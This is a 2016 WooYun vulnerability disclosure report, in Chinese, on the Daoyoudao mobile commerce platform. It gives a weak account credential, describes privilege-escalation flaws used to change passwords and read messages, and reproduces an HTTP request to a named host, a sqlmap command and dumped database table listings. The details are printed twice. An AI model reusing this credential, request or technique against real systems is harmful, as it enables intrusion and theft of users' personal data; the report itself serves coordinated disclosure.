道有道一处SQL注入导致77万用户账号密码泄露/泄露51万商家消息(可修改APK/内部多处越权) | wooyun-2016-0189559

漏洞概要关注数(24) 关注此漏洞

缺陷编号：

wooyun-2016-0189559

漏洞标题：

道有道一处SQL注入导致77万用户账号密码泄露/泄露51万商家消息(可修改APK/内部多处越权)

漏洞详情

披露状态：

2016-03-27：细节已通知厂商并且等待厂商处理中
2016-03-28：厂商已经确认，细节仅向厂商公开
2016-04-07：细节向核心白帽子及相关领域专家公开
2016-04-17：细节向普通白帽子公开
2016-04-27：细节向实习白帽子公开
2016-05-12：细节向公众公开

简要描述：

315被曝光APP恶意吸费，但是下架APP就是防止APP不被篡改的方法吗

详细说明：

jiayoubama 密码1234567

发现个权限大的号，管理的地区多，直接改密码

编辑页可直接修改

消息管理处越权查看任意信息

客服管理客服这里编辑

随便改一个

SQL注入POST

GET /mb/orderdetails.do?ordercode=mb1312311839006231 HTTP/1.1
Host: m.mb.daoyoudao.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.122 Safari/537.36 SE 2.X MetaSr 1.0
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh;q=0.8
Cookie: Hm_lvt_fe0b746d0d97ad96e482bd98c749aff3=1458912937; JSESSIONID=f7344699-6d82-4210-8560-4c12e847d260

注入：F:\sqlmap>sqlmap.py -r 2.txt --dbs

数据库14个可垮裤查询 8w多订单 77w用户

主库表

Database: trade_01
+--------------------------+---------+
| Table                    | Entries |
+--------------------------+---------+
| f_client                 | 1141415 |
| f_msg                    | 517520  |
| f_loginlog               | 241888  |
| f_user                   | 176616  |
| f_product                | 173435  |
| f_freight                | 151668  |
| f_order_detail           | 116543  |
| f_product_attr_price     | 92166   |
| f_order                  | 82834   |
| f_product_subcat         | 76581   |
| f_product_11970_13849    | 73203   |
| f_product_copy           | 71224   |
| f_user_address           | 53635   |
| f_paydetail              | 49290   |
| f_product_attr           | 45317   |
| f_freefreight            | 44025   |
| f_page                   | 40193   |
| f_msg_product            | 31462   |
| f_cat_attr_value         | 29875   |
| dic_category             | 25700   |
| f_order_copy             | 21481   |
| f_paydetail_copy         | 14624   |
| f_fs_guanggao            | 7441    |
| f_category               | 4495    |
| f_guanggao               | 4391    |
| f_gglist_affiliated      | 4300    |
| f_information            | 4176    |
| f_order_operating_record | 3929    |
| f_cat_attr               | 3888    |
| f_client_copy            | 3353    |
| f_leaveword              | 2688    |
| f_user_group_relate      | 2554    |
| temp_msg                 | 2012    |
| f_favorites              | 863     |
| f_share                  | 826     |
| f_store                  | 574     |
| f_promotions             | 434     |
| f_usergroup              | 379     |
| f_quota                  | 330     |
| temp_user_id             | 211     |
| f_promotions_product     | 96      |
| f_adv                    | 46      |
| temp_mobile              | 2       |
+--------------------------+---------+

17w用户跑出数据证明下

数据库androidpn 60w用户

Database: androidpn
+------------------+---------+
| Table            | Entries |
+------------------+---------+
| apn_user         | 608395  |
| apn_notification | 56547   |
+------------------+---------+

漏洞证明：

jiayoubama 密码1234567

发现个权限大的号，管理的地区多，直接改密码

编辑页可直接修改

消息管理处越权查看任意信息

客服管理客服这里编辑

随便改一个

SQL注入POST

GET /mb/orderdetails.do?ordercode=mb1312311839006231 HTTP/1.1
Host: m.mb.daoyoudao.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.122 Safari/537.36 SE 2.X MetaSr 1.0
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh;q=0.8
Cookie: Hm_lvt_fe0b746d0d97ad96e482bd98c749aff3=1458912937; JSESSIONID=f7344699-6d82-4210-8560-4c12e847d260

注入：F:\sqlmap>sqlmap.py -r 2.txt --dbs

数据库14个可垮裤查询 8w多订单 77w用户

主库表

Database: trade_01
+--------------------------+---------+
| Table                    | Entries |
+--------------------------+---------+
| f_client                 | 1141415 |
| f_msg                    | 517520  |
| f_loginlog               | 241888  |
| f_user                   | 176616  |
| f_product                | 173435  |
| f_freight                | 151668  |
| f_order_detail           | 116543  |
| f_product_attr_price     | 92166   |
| f_order                  | 82834   |
| f_product_subcat         | 76581   |
| f_product_11970_13849    | 73203   |
| f_product_copy           | 71224   |
| f_user_address           | 53635   |
| f_paydetail              | 49290   |
| f_product_attr           | 45317   |
| f_freefreight            | 44025   |
| f_page                   | 40193   |
| f_msg_product            | 31462   |
| f_cat_attr_value         | 29875   |
| dic_category             | 25700   |
| f_order_copy             | 21481   |
| f_paydetail_copy         | 14624   |
| f_fs_guanggao            | 7441    |
| f_category               | 4495    |
| f_guanggao               | 4391    |
| f_gglist_affiliated      | 4300    |
| f_information            | 4176    |
| f_order_operating_record | 3929    |
| f_cat_attr               | 3888    |
| f_client_copy            | 3353    |
| f_leaveword              | 2688    |
| f_user_group_relate      | 2554    |
| temp_msg                 | 2012    |
| f_favorites              | 863     |
| f_share                  | 826     |
| f_store                  | 574     |
| f_promotions             | 434     |
| f_usergroup              | 379     |
| f_quota                  | 330     |
| temp_user_id             | 211     |
| f_promotions_product     | 96      |
| f_adv                    | 46      |
| temp_mobile              | 2       |
+--------------------------+---------+

17w用户跑出数据证明下

数据库androidpn 60w用户

Database: androidpn
+------------------+---------+
| Table            | Entries |
+------------------+---------+
| apn_user         | 608395  |
| apn_notification | 56547   |
+------------------+---------+

修复方案：

你懂得修改密码啦

版权声明：转载请注明来源黑色键盘丶@乌云

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：15

确认时间：2016-03-28 10:40

厂商回复：

非常感谢！

WooYun.org

漏洞概要关注数(24) 关注此漏洞

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源黑色键盘丶@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 黑色键盘丶@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

版权声明：转载请注明来源黑色键盘丶@乌云